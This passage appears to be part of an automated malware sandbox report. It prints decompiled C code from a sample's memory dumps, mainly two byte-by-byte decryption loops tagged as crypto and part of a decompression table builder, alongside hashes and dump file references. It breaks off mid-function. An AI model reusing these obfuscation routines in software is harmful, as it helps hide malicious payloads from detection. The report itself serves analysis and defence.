                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                        • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
                        • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                        • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 7333BA86, Relevance: .3, Instructions: 332COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E7333BA86(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				signed int _v12;

				_v12 = _v12 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				while(_v12 < _a8) {
					_v5 =  *((intOrPtr*)(_a4 + _v12));
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0x8a;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0xb2;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x0000002d;
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0x4b;
					_v5 = _v5 & 0x000000ff ^ 0x00000079;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = _v5 & 0x000000ff ^ 0x00000083;
					_v5 = (_v5 & 0x000000ff) + 0x70;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x53;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x0000007d;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0xd8;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0x58;
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0xcd;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) - 0x9c;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x45;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0x5c;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 = (_v5 & 0x000000ff) + 0xdb;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0x72;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x000000b7;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x6d;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0xfb;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 =  ~(_v5 & 0x000000ff);
					 *((char*)(_a4 + _v12)) = _v5;
					_v12 = _v12 + 1;
				}
				return _a4;
			}





                        0x7333ba8b
                        0x7333ba8f
                        0x7333ba9c
                        0x7333bab0
                        0x7333baba
                        0x7333bac6
                        0x7333bacf
                        0x7333bad8
                        0x7333baeb
                        0x7333baf5
                        0x7333baff
                        0x7333bb09
                        0x7333bb12
                        0x7333bb25
                        0x7333bb2e
                        0x7333bb3a
                        0x7333bb43
                        0x7333bb4d
                        0x7333bb60
                        0x7333bb6a
                        0x7333bb74
                        0x7333bb7e
                        0x7333bb90
                        0x7333bb9c
                        0x7333bba6
                        0x7333bbaf
                        0x7333bbb9
                        0x7333bbcc
                        0x7333bbd6
                        0x7333bbe0
                        0x7333bbe9
                        0x7333bbf3
                        0x7333bbfc
                        0x7333bc05
                        0x7333bc0f
                        0x7333bc21
                        0x7333bc2b
                        0x7333bc34
                        0x7333bc40
                        0x7333bc49
                        0x7333bc5c
                        0x7333bc65
                        0x7333bc6f
                        0x7333bc78
                        0x7333bc81
                        0x7333bc8a
                        0x7333bc94
                        0x7333bc9e
                        0x7333bcb1
                        0x7333bcba
                        0x7333bcc6
                        0x7333bccf
                        0x7333bcd8
                        0x7333bcea
                        0x7333bcf3
                        0x7333bd05
                        0x7333bd11
                        0x7333bd1a
                        0x7333bd24
                        0x7333bd2e
                        0x7333bd38
                        0x7333bd42
                        0x7333bd4c
                        0x7333bd5e
                        0x7333bd68
                        0x7333bd72
                        0x7333bd7c
                        0x7333bd86
                        0x7333bd8f
                        0x7333bd98
                        0x7333bdab
                        0x7333bdb4
                        0x7333bdc7
                        0x7333bdd3
                        0x7333bddd
                        0x7333bde7
                        0x7333bdf0
                        0x7333bdf9
                        0x7333be05
                        0x7333be0e
                        0x7333be18
                        0x7333be22
                        0x7333be34
                        0x7333be3d
                        0x7333be47
                        0x7333be53
                        0x7333be5c
                        0x7333be66
                        0x7333be70
                        0x7333be7a
                        0x7333be8d
                        0x7333be96
                        0x7333bea2
                        0x7333ba99
                        0x7333ba99
                        0x7333beaf

                        Memory Dump Source
                        • Source File: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e673fc55a34f5ab6cc06b89f075b3153b663eec9e551ec59e033e83c861066ec
                        • Instruction ID: f6697aefa0a23720ee4eced279382ff4dc9efb56c83ee12af9ef258175c15207
                        • Opcode Fuzzy Hash: e673fc55a34f5ab6cc06b89f075b3153b663eec9e551ec59e033e83c861066ec
                        • Instruction Fuzzy Hash: F7E10354C5D2ECADDB06CBE945617FDBFB45D2A102F0845CAE0E5E6283C13A938EDB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 7333BA95, Relevance: .3, Instructions: 324COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E7333BA95() {
				void* _t458;

				L0:
				while(1) {
					L0:
					 *(_t458 - 8) =  *(_t458 - 8) + 1;
					L1:
					if( *(_t458 - 8) <  *((intOrPtr*)(_t458 + 0xc))) {
						L2:
						 *(_t458 - 1) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) +  *(_t458 - 8)));
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) + 0x8a;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t458 - 1) & 0x000000ff) << 0x00000002;
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) -  *(_t458 - 8);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t458 - 1) & 0x000000ff) << 0x00000005;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) + 0xb2;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^ 0x0000002d;
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t458 - 1) & 0x000000ff) << 0x00000002;
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) - 0x4b;
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^ 0x00000079;
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t458 - 1) & 0x000000ff) << 0x00000007;
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^ 0x00000083;
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) + 0x70;
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) -  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t458 - 1) & 0x000000ff) << 0x00000005;
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) -  *(_t458 - 8);
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) - 0x53;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^ 0x0000007d;
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t458 - 1) & 0x000000ff) << 0x00000001;
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) - 0xd8;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t458 - 1) & 0x000000ff) << 0x00000003;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) + 0x58;
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t458 - 1) & 0x000000ff) << 0x00000006;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) + 0xcd;
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t458 - 1) & 0x000000ff) << 0x00000001;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t458 - 1) & 0x000000ff) << 0x00000007;
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) - 0x9c;
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) + 0x45;
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) +  *(_t458 - 8);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) + 0x5c;
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t458 - 1) & 0x000000ff) << 0x00000001;
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) -  *(_t458 - 8);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) +  *(_t458 - 8);
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t458 - 1) & 0x000000ff) << 0x00000005;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t458 - 1) & 0x000000ff) << 0x00000006;
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) + 0xdb;
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) + 0x72;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^ 0x000000b7;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) - 0x6d;
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t458 - 1) & 0x000000ff) << 0x00000007;
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) + 0xfb;
						 *(_t458 - 1) =  !( *(_t458 - 1) & 0x000000ff);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) +  *(_t458 - 8);
						 *(_t458 - 1) =  *(_t458 - 1) & 0x000000ff ^  *(_t458 - 8);
						 *(_t458 - 1) = ( *(_t458 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t458 - 1) & 0x000000ff) << 0x00000002;
						 *(_t458 - 1) =  ~( *(_t458 - 1) & 0x000000ff);
						 *((char*)( *((intOrPtr*)(_t458 + 8)) +  *(_t458 - 8))) =  *(_t458 - 1);
						continue;
					}
					L3:
					return  *((intOrPtr*)(_t458 + 8));
					L4:
				}
			}




                        0x7333ba95
                        0x7333ba95
                        0x7333ba95
                        0x7333ba99
                        0x7333ba9c
                        0x7333baa2
                        0x7333baa8
                        0x7333bab0
                        0x7333baba
                        0x7333bac6
                        0x7333bacf
                        0x7333bad8
                        0x7333baeb
                        0x7333baf5
                        0x7333baff
                        0x7333bb09
                        0x7333bb12
                        0x7333bb25
                        0x7333bb2e
                        0x7333bb3a
                        0x7333bb43
                        0x7333bb4d
                        0x7333bb60
                        0x7333bb6a
                        0x7333bb74
                        0x7333bb7e
                        0x7333bb90
                        0x7333bb9c
                        0x7333bba6
                        0x7333bbaf
                        0x7333bbb9
                        0x7333bbcc
                        0x7333bbd6
                        0x7333bbe0
                        0x7333bbe9
                        0x7333bbf3
                        0x7333bbfc
                        0x7333bc05
                        0x7333bc0f
                        0x7333bc21
                        0x7333bc2b
                        0x7333bc34
                        0x7333bc40
                        0x7333bc49
                        0x7333bc5c
                        0x7333bc65
                        0x7333bc6f
                        0x7333bc78
                        0x7333bc81
                        0x7333bc8a
                        0x7333bc94
                        0x7333bc9e
                        0x7333bcb1
                        0x7333bcba
                        0x7333bcc6
                        0x7333bccf
                        0x7333bcd8
                        0x7333bcea
                        0x7333bcf3
                        0x7333bd05
                        0x7333bd11
                        0x7333bd1a
                        0x7333bd24
                        0x7333bd2e
                        0x7333bd38
                        0x7333bd42
                        0x7333bd4c
                        0x7333bd5e
                        0x7333bd68
                        0x7333bd72
                        0x7333bd7c
                        0x7333bd86
                        0x7333bd8f
                        0x7333bd98
                        0x7333bdab
                        0x7333bdb4
                        0x7333bdc7
                        0x7333bdd3
                        0x7333bddd
                        0x7333bde7
                        0x7333bdf0
                        0x7333bdf9
                        0x7333be05
                        0x7333be0e
                        0x7333be18
                        0x7333be22
                        0x7333be34
                        0x7333be3d
                        0x7333be47
                        0x7333be53
                        0x7333be5c
                        0x7333be66
                        0x7333be70
                        0x7333be7a
                        0x7333be8d
                        0x7333be96
                        0x7333bea2
                        0x00000000
                        0x7333bea2
                        0x7333bea9
                        0x7333beaf
                        0x00000000
                        0x7333beaf

                        Memory Dump Source
                        • Source File: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 74a386b53c598fbe1026825a719ed031ba399f2747d6a48d41ff75521ca0d145
                        • Instruction ID: 92530d910fcd4d87ee89bea1f3ae7f0db8838f8674abff945a7cf68c18740cbf
                        • Opcode Fuzzy Hash: 74a386b53c598fbe1026825a719ed031ba399f2747d6a48d41ff75521ca0d145
                        • Instruction Fuzzy Hash: C2E1F254C5D2ECADDB46CBE945603FCBFB05D2A102F4845CAE0E5E6283C53A938EDB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406B2B, Relevance: .3, Instructions: 300COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42ceb8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42ceb8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
